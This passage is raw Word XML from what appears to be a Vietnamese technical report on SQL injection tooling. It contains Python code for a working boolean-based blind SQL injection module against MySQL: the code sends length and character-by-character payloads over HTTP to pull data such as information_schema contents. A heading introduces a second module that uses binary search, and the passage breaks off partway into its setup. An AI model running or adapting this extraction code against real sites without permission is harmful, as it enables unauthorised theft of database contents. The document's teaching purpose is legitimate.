          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t xml:space="preserve">payload </w:t>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>" and length({0})={1}".format(query, i)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t xml:space="preserve">result </w:t>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>self.checkQuery(payload)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>if(result == True):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t xml:space="preserve">self.resultLength </w:t>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>i</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>break</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>def getMySQLVersion(self):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t># Query = version()</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>self.logger.info("Get MySQL version")</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>self.runMySQLQuery("version()")</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>def runMySQLQuery(self, query):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>self.logger.info("Run query: {0}".format(query))</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>self.getMySQLLength(query)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>if(self.resultLength == None):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>self.logger.info("Can`t not get query!")</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>exit()</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>self.logger.info("Result length: {0}".format(self.resultLength))</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>self.getMySQLQueryResult(query)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>self.logger.info("Result: {0}".format(self.result))</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t># Clean result</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t xml:space="preserve">self.resultLength </w:t>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>0</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t xml:space="preserve">self.result </w:t>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>""</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>def getMySQLQueryResult(self, query):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t># First get length</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>if(self.resultLength != None):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>for i in range(0, self.resultLength):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>for x in string.printable:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t xml:space="preserve">asciiChar </w:t>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>ord(x)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t xml:space="preserve">payload </w:t>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>" and ascii(substr({0},{1},1))={2}".format(query, (i+1), asciiChar)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t xml:space="preserve">result </w:t>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t xml:space="preserve">= </w:t>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>self.checkQuery(payload)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>if(result == True):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>self.logger.info("Found character number {0} is: {1}".format(i+1, x))</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:lastRenderedPageBreak/>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t xml:space="preserve">self.result </w:t>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>+=</w:t>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>x</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>break</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t># Second get result</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>def checkQuery(self, payload):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t># Return true/false of query</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t># If contain, return True, if not, return False</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t># Or use regex</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t xml:space="preserve">r </w:t>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>self.sendHTTPRequest(payload)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>if(r.text.find(self.basicOptions["PATTERN"]["currentSetting"]) &gt; 0):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>return True</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>else:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>return False</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>def run(self):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t># We coding here</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t># Query ex: select version() from dual</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>self.runMySQLQuery("(select DESCRIPTION from information_schema.CHARACTER_SETS limit 6,1)")</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
              <w:rPr>
                <w:szCs w:val="28"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00325E74" w:rsidRDefault="008B3D7D" w:rsidP="00FC6730">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="136" w:name="_Toc459822530"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Module Blind SQL injection sử dụng tìm kiếm nhị phân</w:t>
      </w:r>
      <w:bookmarkEnd w:id="136"/>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binary search"</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lastRenderedPageBreak/>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self.maxLength </w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>255</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 xml:space="preserve">self.basicOptions["PATTERN"] </w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>{</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>"currentSetting"</w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>:</w:t>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
              <w:t>None,</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="008B3D7D" w:rsidRPr="008B3D7D" w:rsidRDefault="008B3D7D" w:rsidP="008B3D7D">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B3D7D">
              <w:tab/>
            </w:r>
